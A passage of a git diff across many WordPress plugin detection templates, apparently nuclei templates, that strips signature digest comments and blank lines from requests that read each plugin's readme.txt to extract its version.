4a0a004730450220615ba9944c333fdd90efe5ec26a846b4a3f42fde41807af18cb9fe71d8b394fc0221009512fcd8632d70a54889ca1a1dbd878e9350bff82e8e0ebce637bf55ef018b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 1d134302a4..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/simple-history/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058f9ba32f42ca9b8a6a5a30f8bd0f98f3559318327922973b5026cc07c999aa9022100d5a2ced263c5f8d960337fb5813db94d4c739906c6fa89ef411c64d974bb819f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 5bce277c69..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7de37cbd4290d2b5059ad47ad4c139f71325b99540fd2b90aad6dd5fa42935602205650a286debf963c55df9ba337272cb279abe0283e3fd2bbda0a55438bcd31dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 68eadde6a0..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ffc863df2c11224ea4ef2b7d7169b9f4ee24522701db5df98e470d8a99f74731022100d55bc174045b9d98b87eb41be87cd817e371e0fa9f45284aea0e76071ca8891f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 8b434a9cca..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f44162d1d5e52bc86a3f3ab3157b1773fac7c6872837a46cc0f3a643e980f050022100bd5f888f8c2ceb2d5644598d8125a80d2d64a8285fac1cb354f47d88b574ea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index fc5afd55c1..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050ab2f026b268a1ab1c8058cb0cedff35fcccd9e9af8da803d2828a99ce1c7aa022040b4622addd408efaa8e07ab1a2a1d5864b7040dc99f873b9cb46ad55cffff29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 75e508706b..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sticky-header-effects-for-elementor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e0993d32f06ebf9552d3c83c85d41e9d333796b6b8b82190f3cbeb085fa278e022100fd7a0475b1747d2a999fd765498c674965d08ba7c75113e2791c10570cfe7ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index a9baffcaed..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac26591f51e3cc8b830c36600b0e92f4398b30ace389d6638db4d196fcae137d02204737a89057bd996a7cdf25b941c90dae5d80fdf48324a2bfcbb04c7b9c60ce80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index d0af952337..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015450df502f39f4e6da733f42b5ee69898ad0c3d45cd7d731b492173fca3a762022077f39ff9e72d971a89d6694009ff50eb21ca21dcafa4317b53af11825389d1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index d2da21468b..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049a7db5ef1dc0d566bd1da0245700c3c715b8f05bb1b5fcad63845692ae25edf022100ea9cbb39bee069c526d620436e8ea5e645924d1fac85becd4ef47a2695790878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 4af54b493d..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100861fd87b58f4a5d356ccfeb97dd926ff1552ef42bffeaf5ffeca0df3fa207ca4022035c6bd31cac4f4ec410744948b48a3cb77ad50aba0ab22f5aaa5943578d88374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 3232d2370f..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b27f262b5100187f39fd4dbce8d7c23bb54c3d5d5e1f732f3d42d6d73a2304802207358ba0e1bc7d12059867e101c12f096fabd23f880bf65fc34b49d6edf64a803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index ec52713950..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066012572d25c94922d65b7894155cfe946411f915a1868cddfe4350b0d7cd3b7022100c6aacd2f75506a6354ec6b39ab82ac456b9de3decd672fa6c5356d3c8360db74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 1da56bd3a5..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/templately/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b4ac96986879faacf13bd98d69a68a0a75d42d9eaea3fc67fdc6f32a2080eac202203b51754f4c5a914b8d296d7446647159bb94b460bb97e3fb4f8280b0ecf24bf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 6058fd3327..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c503610e368f018fbc2493ec03de072ec8401d1e7fc7eb78e47bc036c6d0452022064ea5df1438521f06a3844eb377678140acbd2492f25d67e21e1a97148c6b27a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index ddc669a179..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d39294d70e002763e766c206f33c94bc9d21e3d3c59ce42bcae9028a23d56096022100cd53120009c945be24235464ecab7891185849c1ad44a2a641ece5822ef44523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 75f9a9f239..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097a2ec507157614c9969305a76cb6fb6725a36eb37fe140bc963d81062e37d0202210080abcdd860041973499c8aebd2c4ba978c39e338ffda03734ff6747b25e02469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 923311bc06..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050769a5a20d4cf414fb5de51006a49b1fa65cc4b77ef2d8c40dd45fd12b2ecec02205e3a95fdb9c370c2a5ff974b8827e60a448c40ef3efe77deefe237dd7daa7be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index cfe5c930cf..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022044fbab6082c8a66ed21762bde1df4e926bcd9f06deee5fd3235f27d9e6c91b390221009554d03519be01faef99136e4d037107dfaf8f7019ef7e08d4115181687a575d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 909f097c23..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3aa57fb44259b36343c0db6aefa098346b64f105e58841ca51d2b54e87c8984022100ee81cb5e3426ffe6291077d21fd1b32478fdae713f3c7037deac35321b57f902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index fdb0d42fdf..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017f47e2dcf2275624da6293dabcac3e5df4d417125eac3b41d7865569f946c780220216dd435dbb50b60875c08beb38d482f11baff933e5a1163ac1cece049d5adc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index c87c17aeb5..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220202805a09cdbc4f379d059a78b5d5b4d5a84460b5ec5dbf1634a73c01fb5eb51022037021e403fc73700dc259cfd09cb60ae9b22b416898146d20aba3106a9cab041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index ca1db01da9..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100efe91cb227f42ed6f3e97960618e2dec3e886173aaf7e33d5d11ea76277f8fd2022100d27cf5d9820dd75f95fcb7abaf35b7c0aef0e7f84ab17177915b34913f9a37b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 660f02d5d4..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aea12848dcd4dce092a88b832733253b26df63c903a9c4a5d96f01285287cd9002202c2636aa816ccb323d95f095078cf442182d37c9d68ec5914a61b0157bc63051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2338b82b21..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd5be8ec532ab536405d8e0594d00dad45a7581ac12468f7686a86218b714d0a022100d60c3c0936ec481b8550dc439b0a9e2ce43bc25f812fda328a566b4320f31260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index a4ee458100..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062f4b720da25a772797ab143d6c2b78378629c88decea878e71c14becc5805a9022100fa8721f99bca7d1f672b4004493ee5ea8015ce70d3667caf31f04d2474ac4f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 9ecc93011a..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2746537cc8c21654236583b1886e960b69f6a7b9d05b1858e4f20f28a9265cf02205388bf0244e33608c43dc23d8c23cc121f226c95e1435e4e917ac331361e08fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 132d603114..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6b86d290f40b245b83295ed984a0ebaec54a525edba8ce89c95e127c49a7f250220288181f02d708f440b8c06ac192936b838a7dd9c76622eb51bdc2de4bdb23f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index dd941b8230..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc13fa55d7029191a6681a4f49b5bc9bb0d27640074f022527953e6d8ead1148022100eb5eb036b680ef7167dbd9e1047694cfbc4851af3d41de8a8760f2c4febfa91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index f601350745..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-legacy-rest-api/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b161f8acfa68d06824d8f75e7caf6fa3cc5a92141972f9e328a3b6984c90b72602206a3790758ddc7720bf36366abad39350c40e045385c9de5d4145ec16df982cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 19630aa318..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201373f17763bdbc44f9f4e0e85d30fbd528b30797babfbafda2c33af0b006d22202202f0b9959b6f6ff11577d5f8347e778054c749e58829e652bd3b6c85df301aac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index afed5f3b0a..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009639f50d511255d59e92a76f5157731b0825d4662eb5d38f5fefa43f9a7bc398022100ae759590a63cf56c247cce65872dd045fea2c65ab9a5bcd541a3a476a6c34347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1e2ba6bf61..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008af5cc4b5ed4cf3369766219bbd509ef2c0d8985565130e7db25290c61ee4d9022012ff3fc6a9f2bfecb21925978c986b2b29d0958bc12fabdd45442071665cdede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4e09db85ee..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9d28ac8f1e2dbc63f9a07fc47b1b32f3b7c2dfe2527233354474ee5820c592a022100eee5dd439f0435adf6afa9043d1b96d1c6016e15c54aa31ddaede0a865a122dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 5fee367845..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbdb3b4c2647a590f0d47ad92a270a90d8df6e52626a9d624e66b6c8fd796963022100da018c38d7a09b0f89d218dfbd4111a353c5708c561fd93564a56431f8a791aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 3a88a7df69..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097c293545df50293724fc78f8a75007840337fc3f577845f8a8af888bf37a4be022100db39e94048511ccd86397739e48bec0fd9e888e3865ab6cb204c9a3b80cd9d73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6a6db8841f..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f31aa1985a798cb83f8458c5c8591d657ae7f405a30cc8182aae8e63615784902206109726cecf0b5c46fe101e202af06785cdd734b9d8574eddf090f96b8867c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 842794d59a..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205eede1c7feaa47bf947700c28eb710a2c9886f06306f0d0c6f49f6918dd61f9402206fac703db79bb577951c7695413516a92a0f84fb45c349e9959c5fb20e491140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7b3e6f07b9..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220764a9f3033a3cd91bff5f05d50c2b9a05f426b4d974566000ccc34e7644a780a02200eb9020c8ed5c3809ecc3bd2f31311e5e882892f979d2f488640f271a5212dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5259ac2cec..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - 